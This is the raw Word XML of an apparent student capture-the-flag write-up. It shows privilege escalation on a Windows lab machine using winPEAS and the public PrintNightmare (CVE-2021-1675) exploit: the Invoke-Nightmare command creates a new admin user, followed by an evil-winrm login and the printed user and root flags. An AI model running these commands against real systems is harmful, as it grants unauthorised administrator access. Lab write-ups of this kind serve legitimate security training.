    <w:p w14:paraId="418BD9C9" w14:textId="5BE3310C" w:rsidR="00672CEA" w:rsidRPr="002872B9" w:rsidRDefault="00672CEA" w:rsidP="003F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2B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user flag : 9223cc388331f4e3d390a79474e75928</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26352709" w14:textId="2D3FD5C1" w:rsidR="003F7E52" w:rsidRPr="00672CEA" w:rsidRDefault="003F7E52" w:rsidP="003F7E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="007F7CAD" w14:textId="26D016DE" w:rsidR="003F7E52" w:rsidRDefault="003F7E52" w:rsidP="00EB7408">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1723EA3E" w14:textId="7F5C8446" w:rsidR="00917AED" w:rsidRPr="00917AED" w:rsidRDefault="00917AED" w:rsidP="0091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FLAG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17045D8C" w14:textId="2A67DF4A" w:rsidR="00EB7408" w:rsidRDefault="00A57CE7" w:rsidP="00EB7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already got user flag, now it’s time to find the root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117FFEFA" w14:textId="3E8CB99F" w:rsidR="00A57CE7" w:rsidRDefault="00A57CE7" w:rsidP="00EB7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find, we use a tool for privilege escalation “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A7484A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>winPEAS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Download it on your kali machine and upload it on the </w:t>
      </w:r>
      <w:r w:rsidR="00A7484A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>target machine, with the following command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6FDE71" w14:textId="48C53A88" w:rsidR="00A7484A" w:rsidRPr="00672CEA" w:rsidRDefault="00A7484A" w:rsidP="00EB7408">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F41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F075951" wp14:editId="721A1566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43600" cy="1228090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21109"/>
                <wp:lineTo x="21531" y="21109"/>
                <wp:lineTo x="21531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command : upload /your/directory/winpeas.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237C78B6" w14:textId="4AE5A777" w:rsidR="00EB7408" w:rsidRPr="00672CEA" w:rsidRDefault="00EB7408" w:rsidP="00EB7408">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32A0727E" w14:textId="3F3AE903" w:rsidR="00EB7408" w:rsidRPr="00672CEA" w:rsidRDefault="00EB7408" w:rsidP="00EB7408">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CD8D1FB" w14:textId="2666B2D8" w:rsidR="00EB7408" w:rsidRDefault="00EB7408" w:rsidP="00EB7408">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E021608" w14:textId="2113FFCF" w:rsidR="00B64D5D" w:rsidRDefault="00B64D5D" w:rsidP="00EB7408">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="174965F1" w14:textId="39F23863" w:rsidR="00B64D5D" w:rsidRDefault="00A7484A" w:rsidP="00EB7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uploading, try to run it using winpeas.exe to enumerate everything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C69FED1" w14:textId="7F12EAD5" w:rsidR="00A7484A" w:rsidRDefault="00A7484A" w:rsidP="00EB7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:./winpeas.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C7F6BA" w14:textId="7A85237C" w:rsidR="00A7484A" w:rsidRDefault="00A7484A" w:rsidP="00EB7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service that run on the machine</w:t>
      </w:r>
      <w:r w:rsidR="00852A29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, all of these service are not vulnerable except for one, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00852A29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>spoolsv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00852A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DEBBB" w14:textId="24578160" w:rsidR="00B64D5D" w:rsidRPr="00672CEA" w:rsidRDefault="00B64D5D" w:rsidP="00EB7408">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B64D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C0AFAB1" wp14:editId="3DE2C93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929765"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight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ight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7618B" w14:textId="77777777" w:rsidR="0031371A" w:rsidRDefault="0031371A" w:rsidP="00313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Spoolsv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:-spoolsv.exe run in windows OS print spooler service. I look up on google to find Windows OS spooler vulnerability and find this link : </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="002E3B4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https://github.com/calebstewart/CVE-2021-1675</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D994E58" w14:textId="53283F66" w:rsidR="00A7484A" w:rsidRDefault="00A7484A" w:rsidP="00EB7408">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A14FBEE" w14:textId="08ED8948" w:rsidR="00E834EA" w:rsidRPr="00672CEA" w:rsidRDefault="00E834EA" w:rsidP="00EB7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tool on the link ready to upload it on target machine. You can rename the .ps1 file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063AC33C" w14:textId="2412F1E5" w:rsidR="00EB7408" w:rsidRPr="00672CEA" w:rsidRDefault="00E834EA" w:rsidP="00EB7408">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E834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C569E35" wp14:editId="23F29DE5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1885315"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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for easy typing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBD5293" w14:textId="1E57E167" w:rsidR="00EB7408" w:rsidRPr="00672CEA" w:rsidRDefault="00EB7408" w:rsidP="00EB7408">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B299674" w14:textId="28BD583C" w:rsidR="003F7E52" w:rsidRDefault="003F7E52" w:rsidP="003F7E52"/>
    <w:p w14:paraId="02EEC9A5" w14:textId="1DBA7C3C" w:rsidR="00E834EA" w:rsidRDefault="00E834EA" w:rsidP="003F7E52"/>
    <w:p w14:paraId="163CD39B" w14:textId="368EA891" w:rsidR="00E834EA" w:rsidRDefault="00E834EA" w:rsidP="003F7E52"/>
    <w:p w14:paraId="19E5928D" w14:textId="52F82229" w:rsidR="00E834EA" w:rsidRPr="006B08B8" w:rsidRDefault="00E834EA" w:rsidP="003F7E52">
      <w:pPr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7A0DE4B" wp14:editId="14435BCF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531" y="21221"/>
                <wp:lineTo x="21531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8B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Successfully upload the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661075F0" w14:textId="62402C80" w:rsidR="00A57CE7" w:rsidRPr="006B08B8" w:rsidRDefault="00A57CE7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</w:p>
    <w:p w14:paraId="24D777C1" w14:textId="25251D16" w:rsidR="00A57CE7" w:rsidRPr="006B08B8" w:rsidRDefault="00E834EA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 xml:space="preserve">Now, you can upload and run the file but it will fails that’s because only admin </w:t>
      </w:r>
      <w:r w:rsidR="009F01F8" w:rsidRPr="006B08B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">user </w:t>
      </w:r>
      <w:r w:rsidRPr="006B08B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>can run .exe file, so what we do now is create the new user</w:t>
      </w:r>
      <w:r w:rsidR="009F01F8" w:rsidRPr="006B08B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with admin permission with the following command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD99F8C" w14:textId="06CA8D70" w:rsidR="009F01F8" w:rsidRPr="006B08B8" w:rsidRDefault="009F01F8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</w:p>
    <w:p w14:paraId="23A0B16B" w14:textId="1D0B50AA" w:rsidR="009F01F8" w:rsidRPr="006B08B8" w:rsidRDefault="009F01F8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>Command : Import-Module ./[your .ps1 file name]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E17821D" w14:textId="0C85C14F" w:rsidR="00A57CE7" w:rsidRPr="006B08B8" w:rsidRDefault="009F01F8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>Command : Invoke-Nightmare -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B08B8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6B08B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “[input name]” -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B08B8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6B08B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “[input password]”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A828A9A" w14:textId="1C036020" w:rsidR="00A57CE7" w:rsidRPr="006B08B8" w:rsidRDefault="00E834EA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4EF0C78" wp14:editId="488B72BB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94360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531" y="21274"/>
                <wp:lineTo x="21531" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight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308D3" w14:textId="2C268249" w:rsidR="00A57CE7" w:rsidRPr="006B08B8" w:rsidRDefault="00A57CE7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</w:p>
    <w:p w14:paraId="5C60F91E" w14:textId="424847F5" w:rsidR="00A57CE7" w:rsidRPr="006B08B8" w:rsidRDefault="009F01F8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>After successfully creating a new credential with admin permission, try to login again with evil-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B08B8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6B08B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (remember to exit first)  but use the new credential that you create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B06469F" w14:textId="450FEB83" w:rsidR="009F01F8" w:rsidRPr="006B08B8" w:rsidRDefault="009F01F8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>Command : evil-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B08B8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6B08B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B08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08B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.10.11.106 -u [input username] -p [input password]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D79097" w14:textId="3CC13B4A" w:rsidR="00A57CE7" w:rsidRPr="006B08B8" w:rsidRDefault="00A57CE7" w:rsidP="00A57CE7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044C1F6" wp14:editId="5C0C6D6F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943600" cy="1530350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18D8" w14:textId="2340894B" w:rsidR="00A57CE7" w:rsidRPr="006B08B8" w:rsidRDefault="00A57CE7" w:rsidP="00A57CE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DDFD38A" w14:textId="5A422FB6" w:rsidR="006B08B8" w:rsidRPr="006B08B8" w:rsidRDefault="006B08B8" w:rsidP="00A57CE7">
      <w:pPr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>Successfully login with admin permission, now find the root.txt and open that file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BB9AF4" w14:textId="73CB55C6" w:rsidR="00A57CE7" w:rsidRPr="006B08B8" w:rsidRDefault="006B08B8" w:rsidP="00A57CE7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="27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08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7002B23" wp14:editId="3BF65298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1908175"/>
            <wp:effectExtent l="0" t="0" r="0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CE7" w:rsidRPr="006B08B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Root flag : c690a6a651bf2403092304099c9864b6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA694D9" w14:textId="43A935DA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4D83D10C" w14:textId="54F7A5EE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59924649" w14:textId="5C6DED2E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0030D349" w14:textId="3F719FD4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  <w:r w:rsidRPr="006B08B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>~Thank you~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3005D5" w14:textId="6F5C7ED6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4A7ADC5D" w14:textId="6664C91A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4383EB2C" w14:textId="36E1D312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106B3C73" w14:textId="7CFAB242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p w14:paraId="38958DCE" w14:textId="77777777" w:rsidR="006B08B8" w:rsidRPr="006B08B8" w:rsidRDefault="006B08B8" w:rsidP="006B08B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006B08B8" w:rsidRPr="006B08B8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8599" w14:textId="77777777" w:rsidR="00D401B3" w:rsidRDefault="00D401B3" w:rsidP="0074149D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4320249E" w14:textId="77777777" w:rsidR="00D401B3" w:rsidRDefault="00D401B3" w:rsidP="0074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5D96" w14:textId="77777777" w:rsidR="00D401B3" w:rsidRDefault="00D401B3" w:rsidP="0074149D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0B168594" w14:textId="77777777" w:rsidR="00D401B3" w:rsidRDefault="00D401B3" w:rsidP="0074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8E7A" w14:textId="087DEB59" w:rsidR="0074149D" w:rsidRDefault="0074149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Rionel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Irawan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</w:p>
  <w:p w14:paraId="61BA5B52" w14:textId="73BAF991" w:rsidR="0074149D" w:rsidRPr="0074149D" w:rsidRDefault="0074149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La07 / 2440009181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A62C3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94EA6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D"/>
    <w:rsid w:val="00107855"/>
    <w:rsid w:val="001624F9"/>
    <w:rsid w:val="001B3096"/>
    <w:rsid w:val="002872B9"/>
    <w:rsid w:val="002C1547"/>
    <w:rsid w:val="0031371A"/>
    <w:rsid w:val="003408F8"/>
    <w:rsid w:val="003A4AFC"/>
    <w:rsid w:val="003F7E52"/>
    <w:rsid w:val="004469F7"/>
    <w:rsid w:val="00455C0F"/>
    <w:rsid w:val="005A35A9"/>
    <w:rsid w:val="00672CEA"/>
    <w:rsid w:val="006B08B8"/>
    <w:rsid w:val="0074149D"/>
    <w:rsid w:val="00852A29"/>
    <w:rsid w:val="008F416B"/>
    <w:rsid w:val="00917AED"/>
    <w:rsid w:val="009C2A72"/>
    <w:rsid w:val="009F01F8"/>
    <w:rsid w:val="00A11AB2"/>
    <w:rsid w:val="00A57CE7"/>
    <w:rsid w:val="00A7484A"/>
    <w:rsid w:val="00A803EE"/>
    <w:rsid w:val="00B4286F"/>
    <w:rsid w:val="00B64D5D"/>
    <w:rsid w:val="00BF7A8D"/>
    <w:rsid w:val="00CC75F7"/>
    <w:rsid w:val="00D401B3"/>
    <w:rsid w:val="00D933F9"/>
    <w:rsid w:val="00E07A22"/>
    <w:rsid w:val="00E57C12"/>
    <w:rsid w:val="00E834EA"/>
    <w:rsid w:val="00EA2EE4"/>
    <w:rsid w:val="00EB7408"/>
    <w:rsid w:val="00F36FDD"/>
    <w:rsid w:val="00F7449E"/>
    <w:rsid w:val="00F81087"/>
    <w:rsid w:val="00FD3B4E"/>
    <w:rsid w:val="00F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46B8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{26E9641C-9EDF-4322-9D6E-35DD5E5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9D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0074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9D"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A74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8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calebstewart/CVE-2021-167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RIONEL IRAWAN</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>RIONEL IRAWAN</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-16T06:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-16T11:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>